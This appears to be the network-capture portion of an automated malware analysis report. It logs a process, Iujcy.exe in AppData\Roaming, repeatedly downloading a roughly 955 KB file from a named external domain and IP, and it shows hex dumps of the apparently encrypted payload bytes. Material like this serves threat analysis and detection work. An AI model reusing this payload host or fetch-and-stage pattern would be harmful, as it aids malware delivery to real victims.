2024-10-04 08:41:18 UTC	8000	IN	Data Raw: f9 9c 5f 37 dc 28 7b 3f 05 d7 f3 80 4e 90 02 23 ca e6 56 c5 57 6e 1d 63 3f ea e1 84 8c cb 6c d8 ce d1 bf 5e 71 43 20 7b 2d 50 5e f7 2c bb e0 35 30 82 9e 24 ee 14 4b b8 dc 3b 73 43 8d fe 82 40 d5 4f c5 eb f1 6c fa 80 57 52 f7 22 a6 1d 15 b2 8e 03 23 46 d3 b0 70 c4 e0 52 77 6a f9 3a 5d a4 01 36 04 94 39 af 99 14 8d 1f a4 1b e8 8f 6c 91 d8 04 8b e8 24 04 74 6b 08 ef 50 2c 2d 5e 46 35 d6 86 30 b8 e5 37 da 12 d6 f5 9c 9e 44 28 8b 10 bb 69 3b 06 0f 4b f4 bc d8 03 bb ad d5 2d dc 51 2b b4 bc 10 ea d9 ed 99 71 10 d0 1a d1 fb df a3 24 8e 00 28 02 d9 cb ca 6e f4 ea 35 1b 04 cf b8 ee 92 6d 51 d0 23 ea 26 63 32 1a cb c3 9f 7f bc 15 29 8a f8 83 97 0b 36 de e0 2a c6 f7 f6 85 20 53 ad f8 11 2f bc 3e 97 42 ab 27 0d eb 52 ad bb ac de 9d 5b d1 9d ab ff 57 a6 8e 59 90 ce b8 Data Ascii: _7({?N#VWnc?l^qC {-P^,50$K;sC@OlWR"#FpRwj:]69l$tkP,-^F507D(i;K-Q+q$(n5mQ#&c2)6* S/>B'R[WY
2024-10-04 08:41:18 UTC	8000	IN	Data Raw: 05 fe de fe 46 da 07 eb c8 c7 01 a8 e9 3f 18 78 9d 35 b9 39 1b ec 68 f3 fa f8 59 fe 36 74 23 5e 13 56 aa 2d c8 ad 05 94 31 27 43 f4 b3 e1 64 a7 ae dc 94 68 8b 73 ef db ea 03 38 43 01 56 3a cc 54 27 50 83 d2 ea 8f 96 21 ed e0 75 f7 72 d4 30 e7 c5 18 d8 06 ac e8 bb c4 72 43 47 43 67 05 55 ad e2 0c 69 c3 b5 6f fe 15 ac eb ce 55 d2 f8 3b 90 b2 9a 00 36 8d b8 f1 8b 24 e4 0f 24 ce 38 8c 91 20 ae 5b 88 e3 bf c3 38 dd 07 a9 cb 6a fe d8 84 c5 66 18 95 ec f4 70 c2 be 2e 01 0b e3 36 c7 5c c3 50 0e 2f cc 38 e7 c3 f8 1b a2 37 6e d4 fe 78 90 b2 60 3c 57 dc 29 91 5d 95 04 97 57 c5 c0 61 cf 56 ac 3b 23 a1 81 6a 3e 2b 66 54 07 b5 cf 6b 4f 9e 00 3d 1a 5a 00 74 8d de 1f f6 0c eb d9 25 8d 80 55 73 a9 ed 75 0d 81 17 a7 49 b0 25 d1 a3 37 81 07 2d 61 16 08 83 75 b2 e3 da 48 f9 Data Ascii: F?x59hY6t#^V-1'Cdhs8CV:T'P!ur0rCGCgUioU;6$$8 [8jfp.6\P/87nx`<W)]WaV;#j>+fTkO=Zt%UsuI%7-auH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49769	67.212.175.162	443	5428	C:\Users\user\AppData\Roaming\Iujcy.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 08:41:25 UTC	86	OUT	GET /ozeli/Xibknlpkg.vdf HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
2024-10-04 08:41:25 UTC	183	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:41:24 GMT Server: Apache Last-Modified: Thu, 03 Oct 2024 06:37:33 GMT Accept-Ranges: bytes Content-Length: 955400 Connection: close
2024-10-04 08:41:25 UTC	8009	IN	Data Raw: 97 41 07 40 2b 6a 49 2d aa 8d a2 ed 3d af 51 63 04 96 5a 71 83 37 53 9d 78 f4 f9 8b a8 80 49 83 4c 69 6c a2 20 49 5b 8f 56 b7 4d 66 73 37 8b 10 43 7d d7 76 3a 63 e8 ac 0e 10 18 0e ea c9 a4 0f 51 e6 4f 05 55 36 58 e7 d6 4a 84 a1 06 29 66 f2 56 9a 1e 6a 69 c7 67 93 52 c9 d2 19 ab f2 61 46 32 c4 7a 36 e0 90 18 36 e0 d7 f1 fd 88 63 09 bb 87 19 98 e0 41 5c 52 09 85 2f 38 4a 21 74 a0 41 1e 4e 75 93 ca 45 f9 a6 a0 54 23 50 b2 da 56 1f b3 ae f0 9b db 86 18 99 01 57 1b 1a 71 5e 12 80 6f 35 ec ec 38 96 16 bc 3c ff 1d c8 e1 30 80 2b c5 e9 f6 01 20 0f 47 e9 8d 7c 2c b1 ed d3 fa 70 87 d2 6f 67 5d 08 99 54 71 98 8d ea 73 44 37 7d e7 c2 eb f4 e9 b0 37 a3 55 70 e5 ca 78 b7 3e 09 1c 1a c4 11 a6 88 43 90 95 be 81 e0 e0 35 91 05 27 60 51 a5 2f 91 3e ba e4 a3 27 08 1b 21 69 Data Ascii: A@+jI-=QcZq7SxILil I[VMfs7C}v:cQOU6XJ)fVjigRaF2z66cA\R/8J!tANuET#PVWq^o58<0+ G\|,pog]TqsD7}7Upx>C5'`Q/>'!i
2024-10-04 08:41:25 UTC	8000	IN	Data Raw: ee 2a 41 1b 0e f6 fd a1 be b9 69 9a af d3 d2 68 2c 9f 13 b3 9d 48 bc bb d2 33 f4 d3 a8 33 54 6c f2 e4 a2 a2 2d b0 6f 8b ad 2b 1b 43 31 e1 ae ef b5 76 e4 2f 1a 50 6c e2 1e 2e bc 6e d0 02 8c df 2f 3e 75 6b 28 e5 3d c0 a7 46 ac 7e 09 a0 58 42 5e 03 5e 93 29 62 62 3f 2d a2 b1 35 1c 06 25 0f c0 f5 6f 2b 38 a8 30 e5 ce a9 28 80 3c 8e cc 45 13 45 41 11 2a 41 77 2e ed 96 b0 32 9d 6c 5d 44 c7 85 9d 9e de 94 c0 d8 c8 15 98 86 de 72 90 5d 74 bf 5f 04 da e5 34 5b 84 36 4e 24 f6 9c 65 69 9f 40 e7 f7 bc 6b 5f 85 93 72 a0 1e 9e 04 17 5c 3b fb 95 b3 39 cc d9 a2 b3 9c 4c 32 b6 43 bd 8f f8 04 14 56 d6 f7 61 cc 7f f6 8e 65 d8 25 59 9d 6f b1 42 03 05 49 80 7a 1e 88 53 b1 c7 64 53 c1 99 12 db 73 bf 83 1a 8e 7b e4 95 67 35 d2 03 5e fb 5c 04 18 06 3b ea b3 96 f4 49 93 78 9f 87 Data Ascii: Aih,H33Tl-o+C1v/Pl.n/>uk(=F~XB^^)bb?-5%o+80(<EEAAw.2l]Dr]t_4[6N$ei@k_r\;9L2CVae%YoBIzSdSs{g5^\;Ix
2024-10-04 08:41:25 UTC	8000	IN	Data Raw: 8f d6 8f 5a 4c ff e9 6c a1 82 ca 26 92 bf 8a 01 93 58 9f a7 61 84 a9 30 57 b2 ca c9 19 59 3f 97 ab b0 36 17 b5 0c d1 05 88 7d ed 67 4e e8 c8 d1 6b ff a1 78 b9 58 7e e8 f1 50 09 a5 56 69 8c d8 51 9e 83 b6 61 ec 65 3d 72 06 c0 3e 48 d5 cc c7 cd 6a 2b 95 4d e3 bb 80 d8 58 a8 2d 9e a6 a1 bf aa 83 e7 d4 76 1d 3c c7 5f c5 d4 49 3f c8 9a 8f 47 f1 8c 58 8a f3 d7 14 9b 9c 97 08 7b f9 65 65 3c 93 29 ef 36 97 9b bf 5a d4 ff a3 c7 80 d2 0d 70 07 75 ff 03 19 7e 11 0f 48 02 46 51 db 41 11 5b 1f 4a 73 3e ed 1a 90 99 11 dc d2 56 8a 18 94 46 93 57 dd 61 90 28 94 03 b2 3d c7 a7 c0 a4 06 6e ab 02 58 a3 19 10 4d d4 9a cf b2 42 fc c9 b9 97 2f 10 aa e9 38 95 71 82 9f d1 f6 85 9c bb 55 d1 9d 9c 0d 51 86 92 46 be 12 4b 73 6b b6 87 f9 97 ac 47 87 f2 45 50 ba 19 5f 9b b4 a8 4b 58 Data Ascii: ZLl&Xa0WY?6}gNkxX~PViQae=r>Hj+MX-v<_I?GX{ee<)6Zpu~HFQA[Js>VFWa(=nXMB/8qUQFKskGEP_KX
2024-10-04 08:41:25 UTC	8000	IN	Data Raw: cf 2b 48 13 e4 ac b2 98 71 54 8e 0e a0 df d4 25 73 52 71 0a 01 08 25 15 e0 94 7d c9 3a 34 eb 8d a6 c3 d4 07 8c 62 ad a7 fe 26 63 01 71 3b ac d4 74 db a7 87 19 b0 39 7f a3 c3 d3 3c 28 c6 5f d7 d0 b1 65 9f a6 04 f8 7c 47 70 9e a9 d2 51 c4 af a1 74 a7 33 f9 0e 50 31 0c 1b fb a5 d2 76 b0 5f 1c 72 0b a5 81 03 7f c7 78 b2 34 43 26 10 3b e0 ea f1 96 6f b4 89 7e 0e f2 64 d4 69 e7 47 41 d2 eb 6c ac 8d da 49 2b de 35 ad 63 41 be 5f 06 e7 84 ff f9 47 c0 ec da 66 82 08 28 dc f1 84 b6 5a aa ea 22 cd f1 5a 34 94 91 c2 7f ad 53 93 de f6 69 4f d5 85 f0 e0 15 cc de 26 3f e6 7b 7e fb dd e9 41 08 3c 97 a1 79 64 6c c7 c3 a6 18 c6 3c 49 5b c1 e3 7c 34 c0 08 e6 71 2f db c4 62 f8 83 8c 81 30 5f 49 25 04 e2 96 c2 16 14 00 a4 e8 3b d3 a6 9c c1 4c e7 7e 8a 10 24 55 8c 5e 04 6d c9 Data Ascii: +HqT%sRq%}:4b&cq;t9<(_e\|GpQt3P1v_rx4C&;o~diGAlI+5cA_Gf(Z"Z4SiO&?{~A<ydl<I[\|4q/b0_I%;L~$U^m
2024-10-04 08:41:25 UTC	8000	IN	Data Raw: c3 14 2e 7d 82 ab 28 fb 80 79 1e f7 f0 94 f8 3e 43 0c 25 dd be 59 e7 9d cd 28 71 ef d9 48 c6 e3 7a 4f 53 99 1c 4c 41 c0 c4 60 ba 16 c5 22 67 76 5d 7e b2 e8 84 da 5b 97 9d df 78 47 73 e0 e1 eb b3 be 92 59 3c 73 3c bf 84 2a 8b 9a c8 d4 f4 8a d5 ac 3c 14 6b f6 cd b9 2e 8d 18 3a de 67 13 a6 da 1d c2 cf 03 78 1d 78 61 29 b9 7f c0 90 2b 5a 65 dc 02 d6 2d a9 5b 54 a0 0c 93 01 b5 94 4e 26 91 45 48 29 47 6a b4 c5 99 21 94 00 6d ce 89 3f 26 d4 71 b3 05 e6 39 b6 51 cd 3d 08 4b 58 7a 15 11 26 94 4c 3f 52 ee 2e d5 07 21 aa 25 68 62 46 cd 8d 3b 8d 2f 18 df 62 c8 8b a3 ac 0e bf d5 49 d6 b1 0e 10 02 e1 27 85 4c 5d 31 a0 f1 ed 93 1e 27 b5 89 dd e6 22 de 34 a8 56 a2 55 4e 6a d1 7e 99 08 7c 6d c3 c7 f2 35 48 f3 66 28 23 ba a1 4e 15 7b e0 eb d0 5b 1f 80 b5 12 93 04 08 b5 cf Data Ascii: .}(y>C%Y(qHzOSLA`"gv]~[xGsY<s<*<k.:gxxa)+Ze-[TN&EH)Gj!m?&q9Q=KXz&L?R.!%hbF;/bI'L]1'"4VUNj~\|m5Hf(#N{[
2024-10-04 08:41:25 UTC	8000	IN	Data Raw: aa 6a 6c 2c 50 36 96 db 3a 93 7d f5 6f 94 dc 27 f2 ba f0 6e 16 19 06 ca f4 e7 60 bf bd e6 4a 9e 6d 42 62 ff 8c 51 0c 6e 54 20 fd b1 01 af 28 61 bd b8 ce 39 e5 03 41 ea 07 6f 72 b8 c6 af c1 9f 92 6e bf a5 e8 2e 9c d4 0f e5 e1 23 4a f4 f3 be f7 c7 78 5e 5c 48 17 e5 9d 4f c3 fc 6f 03 20 81 3c e5 f7 ed e2 c0 61 e2 a8 8c 6d b9 1e 9d 1e 5c 82 8c 7a 8f 8e 41 63 2b 20 d1 e2 9f b8 9a 49 27 16 da 89 5f d4 70 20 9a ee a7 99 a3 7c 86 59 45 8c 06 44 ca e4 36 b5 25 ca ff cd 04 cb 7b ac 8c 26 97 70 7a 87 77 20 0b bd ed 2b cc 14 c0 4b dd de 9c 46 8f c8 f2 f2 8e 6c fd 1b 36 fa 3e 65 f9 a5 4e 15 71 55 b9 cb b1 f1 29 86 96 17 c1 8f 14 f8 7d 5e 90 68 bc 91 21 25 c0 5e 6e d1 b2 69 db c9 26 b3 e6 ba ab b0 68 4e c6 3c 9d db e2 a2 9a 57 e3 dc ee 43 d7 fd 1f 84 b6 5f 83 4d 5e 67 Data Ascii: jl,P6:}o'n`JmBbQnT (a9Aorn.#Jx^\HOo <am\zAc+ I'_p \|YED6%{&pzw +KFl6>eNqU)}^h!%^ni&hN<WC_M^g
2024-10-04 08:41:27 UTC	8000	IN	Data Raw: 43 dd 9f 7e 9c 3d d9 be a0 1f 94 4c b4 fe 52 ef 6a 2c 70 7a e3 15 24 9d fb 2c 16 cf 8e 99 d5 c5 cf 9c 22 38 7f 08 e9 43 3b 9f d7 c7 07 53 79 84 cc 34 ed 07 85 15 03 66 eb d3 d5 9b 3c e4 50 41 5c 7c df 85 9f ea eb 59 48 cf 7b 7a a4 22 fb 08 da 35 a9 69 40 b3 da 6e 13 93 64 7a ff a0 36 b0 1d cf 09 ce 68 57 e9 20 b0 1f ee 3d d0 60 43 b4 5a 20 8e 70 64 98 a7 85 c6 67 e7 6e c5 ba 93 dd 15 f2 a1 98 93 07 7f 57 fc e4 6e ce b9 35 38 e5 f6 c7 dd d7 2d 8d 58 70 1c ea d7 41 09 e1 51 23 d7 29 bd c7 e7 d7 55 1a 24 be 8d 0d 96 99 46 25 22 20 41 77 ee cf 41 6a a3 63 d8 fc e7 37 eb 91 2a 4b 8c b5 fd cc cc 14 83 3f 4b c3 ee 8b cb b9 03 38 7d 0a 80 a1 93 ed 4c 54 f7 d2 d0 0c f8 71 ab b0 33 16 1e 6b f7 9e 99 ae 4b 58 09 ce 14 3f 71 20 a6 e6 64 94 d7 90 97 0a f6 28 3c ae f7 Data Ascii: C~=LRj,pz$,"8C;Sy4f<PA\\|YH{z"5i@ndz6hW =`CZ pdgnWn58-XpAQ#)U$F%" AwAjc7*K?K8}LTq3kKX?q d(<
2024-10-04 08:41:27 UTC	8000	IN	Data Raw: 34 51 57 d6 6a 59 e4 85 2b 89 89 87 30 72 99 f1 0c 97 ca 0f da dc d9 78 86 4a c3 22 82 22 8b 5e 29 e8 8a c8 0b 40 06 9c 71 a9 1b fd 97 8f b7 6f 1f d6 d1 03 a2 ac c2 23 4c 55 6e c4 b2 a7 7c fb 25 d3 b2 08 61 9b 3c b6 d6 4a 46 c1 44 f9 2a 12 53 eb b4 f5 c6 f5 cb db 58 b7 21 ee 9a dc 37 e0 68 33 a0 43 0a 09 80 07 f8 7e 51 71 a4 85 63 52 a9 aa e4 4e 3c 2f 50 d3 8f 6e e7 bc 5c 1e d6 7b f8 8f 09 64 bb 97 4b dd 39 96 67 65 9e 18 82 b5 80 4b 0e f8 99 96 d8 bb 56 a5 f1 1c 22 e1 6f 4a a2 06 52 80 26 4d 4d 71 99 6a 7d 00 54 e0 ed 0c 5f b3 dc ca 6d b2 96 5d db 6e 4a fd 1a 40 95 b7 ba ee eb b1 aa 92 ac f8 cf 90 32 02 2f ee 83 8b a1 e9 d3 05 0b e9 6a 65 6e 74 d2 6c f6 a0 6c ff 5b 84 2a a4 9a 5d e3 10 22 ae 40 67 30 0c 75 f1 59 d1 b8 b3 22 41 4e 91 b0 ce f5 0e 7e 5d ea Data Ascii: 4QWjY+0rxJ""^)@qo#LUn\|%a<JFDSX!7h3C~QqcRN</Pn\{dK9geKV"oJR&MMqj}T_m]nJ@2/jentll[]"@g0uY"AN~]
2024-10-04 08:41:27 UTC	8000	IN	Data Raw: f9 9c 5f 37 dc 28 7b 3f 05 d7 f3 80 4e 90 02 23 ca e6 56 c5 57 6e 1d 63 3f ea e1 84 8c cb 6c d8 ce d1 bf 5e 71 43 20 7b 2d 50 5e f7 2c bb e0 35 30 82 9e 24 ee 14 4b b8 dc 3b 73 43 8d fe 82 40 d5 4f c5 eb f1 6c fa 80 57 52 f7 22 a6 1d 15 b2 8e 03 23 46 d3 b0 70 c4 e0 52 77 6a f9 3a 5d a4 01 36 04 94 39 af 99 14 8d 1f a4 1b e8 8f 6c 91 d8 04 8b e8 24 04 74 6b 08 ef 50 2c 2d 5e 46 35 d6 86 30 b8 e5 37 da 12 d6 f5 9c 9e 44 28 8b 10 bb 69 3b 06 0f 4b f4 bc d8 03 bb ad d5 2d dc 51 2b b4 bc 10 ea d9 ed 99 71 10 d0 1a d1 fb df a3 24 8e 00 28 02 d9 cb ca 6e f4 ea 35 1b 04 cf b8 ee 92 6d 51 d0 23 ea 26 63 32 1a cb c3 9f 7f bc 15 29 8a f8 83 97 0b 36 de e0 2a c6 f7 f6 85 20 53 ad f8 11 2f bc 3e 97 42 ab 27 0d eb 52 ad bb ac de 9d 5b d1 9d ab ff 57 a6 8e 59 90 ce b8 Data Ascii: _7({?N#VWnc?l^qC {-P^,50$K;sC@OlWR"#FpRwj:]69l$tkP,-^F507D(i;K-Q+q$(n5mQ#&c2)6* S/>B'R[WY
2024-10-04 08:41:27 UTC	8000	IN	Data Raw: 05 fe de fe 46 da 07 eb c8 c7 01 a8 e9 3f 18 78 9d 35 b9 39 1b ec 68 f3 fa f8 59 fe 36 74 23 5e 13 56 aa 2d c8 ad 05 94 31 27 43 f4 b3 e1 64 a7 ae dc 94 68 8b 73 ef db ea 03 38 43 01 56 3a cc 54 27 50 83 d2 ea 8f 96 21 ed e0 75 f7 72 d4 30 e7 c5 18 d8 06 ac e8 bb c4 72 43 47 43 67 05 55 ad e2 0c 69 c3 b5 6f fe 15 ac eb ce 55 d2 f8 3b 90 b2 9a 00 36 8d b8 f1 8b 24 e4 0f 24 ce 38 8c 91 20 ae 5b 88 e3 bf c3 38 dd 07 a9 cb 6a fe d8 84 c5 66 18 95 ec f4 70 c2 be 2e 01 0b e3 36 c7 5c c3 50 0e 2f cc 38 e7 c3 f8 1b a2 37 6e d4 fe 78 90 b2 60 3c 57 dc 29 91 5d 95 04 97 57 c5 c0 61 cf 56 ac 3b 23 a1 81 6a 3e 2b 66 54 07 b5 cf 6b 4f 9e 00 3d 1a 5a 00 74 8d de 1f f6 0c eb d9 25 8d 80 55 73 a9 ed 75 0d 81 17 a7 49 b0 25 d1 a3 37 81 07 2d 61 16 08 83 75 b2 e3 da 48 f9 Data Ascii: F?x59hY6t#^V-1'Cdhs8CV:T'P!ur0rCGCgUioU;6$$8 [8jfp.6\P/87nx`<W)]WaV;#j>+fTkO=Zt%UsuI%7-auH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49775	67.212.175.162	443	5428	C:\Users\user\AppData\Roaming\Iujcy.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 08:41:27 UTC	86	OUT	GET /ozeli/Xibknlpkg.vdf HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
2024-10-04 08:41:28 UTC	183	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:41:26 GMT Server: Apache Last-Modified: Thu, 03 Oct 2024 06:37:33 GMT Accept-Ranges: bytes Content-Length: 955400 Connection: close
2024-10-04 08:41:28 UTC	8009	IN	Data Raw: 97 41 07 40 2b 6a 49 2d aa 8d a2 ed 3d af 51 63 04 96 5a 71 83 37 53 9d 78 f4 f9 8b a8 80 49 83 4c 69 6c a2 20 49 5b 8f 56 b7 4d 66 73 37 8b 10 43 7d d7 76 3a 63 e8 ac 0e 10 18 0e ea c9 a4 0f 51 e6 4f 05 55 36 58 e7 d6 4a 84 a1 06 29 66 f2 56 9a 1e 6a 69 c7 67 93 52 c9 d2 19 ab f2 61 46 32 c4 7a 36 e0 90 18 36 e0 d7 f1 fd 88 63 09 bb 87 19 98 e0 41 5c 52 09 85 2f 38 4a 21 74 a0 41 1e 4e 75 93 ca 45 f9 a6 a0 54 23 50 b2 da 56 1f b3 ae f0 9b db 86 18 99 01 57 1b 1a 71 5e 12 80 6f 35 ec ec 38 96 16 bc 3c ff 1d c8 e1 30 80 2b c5 e9 f6 01 20 0f 47 e9 8d 7c 2c b1 ed d3 fa 70 87 d2 6f 67 5d 08 99 54 71 98 8d ea 73 44 37 7d e7 c2 eb f4 e9 b0 37 a3 55 70 e5 ca 78 b7 3e 09 1c 1a c4 11 a6 88 43 90 95 be 81 e0 e0 35 91 05 27 60 51 a5 2f 91 3e ba e4 a3 27 08 1b 21 69 Data Ascii: A@+jI-=QcZq7SxILil I[VMfs7C}v:cQOU6XJ)fVjigRaF2z66cA\R/8J!tANuET#PVWq^o58<0+ G\|,pog]TqsD7}7Upx>C5'`Q/>'!i
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: ee 2a 41 1b 0e f6 fd a1 be b9 69 9a af d3 d2 68 2c 9f 13 b3 9d 48 bc bb d2 33 f4 d3 a8 33 54 6c f2 e4 a2 a2 2d b0 6f 8b ad 2b 1b 43 31 e1 ae ef b5 76 e4 2f 1a 50 6c e2 1e 2e bc 6e d0 02 8c df 2f 3e 75 6b 28 e5 3d c0 a7 46 ac 7e 09 a0 58 42 5e 03 5e 93 29 62 62 3f 2d a2 b1 35 1c 06 25 0f c0 f5 6f 2b 38 a8 30 e5 ce a9 28 80 3c 8e cc 45 13 45 41 11 2a 41 77 2e ed 96 b0 32 9d 6c 5d 44 c7 85 9d 9e de 94 c0 d8 c8 15 98 86 de 72 90 5d 74 bf 5f 04 da e5 34 5b 84 36 4e 24 f6 9c 65 69 9f 40 e7 f7 bc 6b 5f 85 93 72 a0 1e 9e 04 17 5c 3b fb 95 b3 39 cc d9 a2 b3 9c 4c 32 b6 43 bd 8f f8 04 14 56 d6 f7 61 cc 7f f6 8e 65 d8 25 59 9d 6f b1 42 03 05 49 80 7a 1e 88 53 b1 c7 64 53 c1 99 12 db 73 bf 83 1a 8e 7b e4 95 67 35 d2 03 5e fb 5c 04 18 06 3b ea b3 96 f4 49 93 78 9f 87 Data Ascii: Aih,H33Tl-o+C1v/Pl.n/>uk(=F~XB^^)bb?-5%o+80(<EEAAw.2l]Dr]t_4[6N$ei@k_r\;9L2CVae%YoBIzSdSs{g5^\;Ix
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: 8f d6 8f 5a 4c ff e9 6c a1 82 ca 26 92 bf 8a 01 93 58 9f a7 61 84 a9 30 57 b2 ca c9 19 59 3f 97 ab b0 36 17 b5 0c d1 05 88 7d ed 67 4e e8 c8 d1 6b ff a1 78 b9 58 7e e8 f1 50 09 a5 56 69 8c d8 51 9e 83 b6 61 ec 65 3d 72 06 c0 3e 48 d5 cc c7 cd 6a 2b 95 4d e3 bb 80 d8 58 a8 2d 9e a6 a1 bf aa 83 e7 d4 76 1d 3c c7 5f c5 d4 49 3f c8 9a 8f 47 f1 8c 58 8a f3 d7 14 9b 9c 97 08 7b f9 65 65 3c 93 29 ef 36 97 9b bf 5a d4 ff a3 c7 80 d2 0d 70 07 75 ff 03 19 7e 11 0f 48 02 46 51 db 41 11 5b 1f 4a 73 3e ed 1a 90 99 11 dc d2 56 8a 18 94 46 93 57 dd 61 90 28 94 03 b2 3d c7 a7 c0 a4 06 6e ab 02 58 a3 19 10 4d d4 9a cf b2 42 fc c9 b9 97 2f 10 aa e9 38 95 71 82 9f d1 f6 85 9c bb 55 d1 9d 9c 0d 51 86 92 46 be 12 4b 73 6b b6 87 f9 97 ac 47 87 f2 45 50 ba 19 5f 9b b4 a8 4b 58 Data Ascii: ZLl&Xa0WY?6}gNkxX~PViQae=r>Hj+MX-v<_I?GX{ee<)6Zpu~HFQA[Js>VFWa(=nXMB/8qUQFKskGEP_KX
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: cf 2b 48 13 e4 ac b2 98 71 54 8e 0e a0 df d4 25 73 52 71 0a 01 08 25 15 e0 94 7d c9 3a 34 eb 8d a6 c3 d4 07 8c 62 ad a7 fe 26 63 01 71 3b ac d4 74 db a7 87 19 b0 39 7f a3 c3 d3 3c 28 c6 5f d7 d0 b1 65 9f a6 04 f8 7c 47 70 9e a9 d2 51 c4 af a1 74 a7 33 f9 0e 50 31 0c 1b fb a5 d2 76 b0 5f 1c 72 0b a5 81 03 7f c7 78 b2 34 43 26 10 3b e0 ea f1 96 6f b4 89 7e 0e f2 64 d4 69 e7 47 41 d2 eb 6c ac 8d da 49 2b de 35 ad 63 41 be 5f 06 e7 84 ff f9 47 c0 ec da 66 82 08 28 dc f1 84 b6 5a aa ea 22 cd f1 5a 34 94 91 c2 7f ad 53 93 de f6 69 4f d5 85 f0 e0 15 cc de 26 3f e6 7b 7e fb dd e9 41 08 3c 97 a1 79 64 6c c7 c3 a6 18 c6 3c 49 5b c1 e3 7c 34 c0 08 e6 71 2f db c4 62 f8 83 8c 81 30 5f 49 25 04 e2 96 c2 16 14 00 a4 e8 3b d3 a6 9c c1 4c e7 7e 8a 10 24 55 8c 5e 04 6d c9 Data Ascii: +HqT%sRq%}:4b&cq;t9<(_e\|GpQt3P1v_rx4C&;o~diGAlI+5cA_Gf(Z"Z4SiO&?{~A<ydl<I[\|4q/b0_I%;L~$U^m
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: c3 14 2e 7d 82 ab 28 fb 80 79 1e f7 f0 94 f8 3e 43 0c 25 dd be 59 e7 9d cd 28 71 ef d9 48 c6 e3 7a 4f 53 99 1c 4c 41 c0 c4 60 ba 16 c5 22 67 76 5d 7e b2 e8 84 da 5b 97 9d df 78 47 73 e0 e1 eb b3 be 92 59 3c 73 3c bf 84 2a 8b 9a c8 d4 f4 8a d5 ac 3c 14 6b f6 cd b9 2e 8d 18 3a de 67 13 a6 da 1d c2 cf 03 78 1d 78 61 29 b9 7f c0 90 2b 5a 65 dc 02 d6 2d a9 5b 54 a0 0c 93 01 b5 94 4e 26 91 45 48 29 47 6a b4 c5 99 21 94 00 6d ce 89 3f 26 d4 71 b3 05 e6 39 b6 51 cd 3d 08 4b 58 7a 15 11 26 94 4c 3f 52 ee 2e d5 07 21 aa 25 68 62 46 cd 8d 3b 8d 2f 18 df 62 c8 8b a3 ac 0e bf d5 49 d6 b1 0e 10 02 e1 27 85 4c 5d 31 a0 f1 ed 93 1e 27 b5 89 dd e6 22 de 34 a8 56 a2 55 4e 6a d1 7e 99 08 7c 6d c3 c7 f2 35 48 f3 66 28 23 ba a1 4e 15 7b e0 eb d0 5b 1f 80 b5 12 93 04 08 b5 cf Data Ascii: .}(y>C%Y(qHzOSLA`"gv]~[xGsY<s<*<k.:gxxa)+Ze-[TN&EH)Gj!m?&q9Q=KXz&L?R.!%hbF;/bI'L]1'"4VUNj~\|m5Hf(#N{[
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: aa 6a 6c 2c 50 36 96 db 3a 93 7d f5 6f 94 dc 27 f2 ba f0 6e 16 19 06 ca f4 e7 60 bf bd e6 4a 9e 6d 42 62 ff 8c 51 0c 6e 54 20 fd b1 01 af 28 61 bd b8 ce 39 e5 03 41 ea 07 6f 72 b8 c6 af c1 9f 92 6e bf a5 e8 2e 9c d4 0f e5 e1 23 4a f4 f3 be f7 c7 78 5e 5c 48 17 e5 9d 4f c3 fc 6f 03 20 81 3c e5 f7 ed e2 c0 61 e2 a8 8c 6d b9 1e 9d 1e 5c 82 8c 7a 8f 8e 41 63 2b 20 d1 e2 9f b8 9a 49 27 16 da 89 5f d4 70 20 9a ee a7 99 a3 7c 86 59 45 8c 06 44 ca e4 36 b5 25 ca ff cd 04 cb 7b ac 8c 26 97 70 7a 87 77 20 0b bd ed 2b cc 14 c0 4b dd de 9c 46 8f c8 f2 f2 8e 6c fd 1b 36 fa 3e 65 f9 a5 4e 15 71 55 b9 cb b1 f1 29 86 96 17 c1 8f 14 f8 7d 5e 90 68 bc 91 21 25 c0 5e 6e d1 b2 69 db c9 26 b3 e6 ba ab b0 68 4e c6 3c 9d db e2 a2 9a 57 e3 dc ee 43 d7 fd 1f 84 b6 5f 83 4d 5e 67 Data Ascii: jl,P6:}o'n`JmBbQnT (a9Aorn.#Jx^\HOo <am\zAc+ I'_p \|YED6%{&pzw +KFl6>eNqU)}^h!%^ni&hN<WC_M^g
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: 43 dd 9f 7e 9c 3d d9 be a0 1f 94 4c b4 fe 52 ef 6a 2c 70 7a e3 15 24 9d fb 2c 16 cf 8e 99 d5 c5 cf 9c 22 38 7f 08 e9 43 3b 9f d7 c7 07 53 79 84 cc 34 ed 07 85 15 03 66 eb d3 d5 9b 3c e4 50 41 5c 7c df 85 9f ea eb 59 48 cf 7b 7a a4 22 fb 08 da 35 a9 69 40 b3 da 6e 13 93 64 7a ff a0 36 b0 1d cf 09 ce 68 57 e9 20 b0 1f ee 3d d0 60 43 b4 5a 20 8e 70 64 98 a7 85 c6 67 e7 6e c5 ba 93 dd 15 f2 a1 98 93 07 7f 57 fc e4 6e ce b9 35 38 e5 f6 c7 dd d7 2d 8d 58 70 1c ea d7 41 09 e1 51 23 d7 29 bd c7 e7 d7 55 1a 24 be 8d 0d 96 99 46 25 22 20 41 77 ee cf 41 6a a3 63 d8 fc e7 37 eb 91 2a 4b 8c b5 fd cc cc 14 83 3f 4b c3 ee 8b cb b9 03 38 7d 0a 80 a1 93 ed 4c 54 f7 d2 d0 0c f8 71 ab b0 33 16 1e 6b f7 9e 99 ae 4b 58 09 ce 14 3f 71 20 a6 e6 64 94 d7 90 97 0a f6 28 3c ae f7 Data Ascii: C~=LRj,pz$,"8C;Sy4f<PA\\|YH{z"5i@ndz6hW =`CZ pdgnWn58-XpAQ#)U$F%" AwAjc7*K?K8}LTq3kKX?q d(<
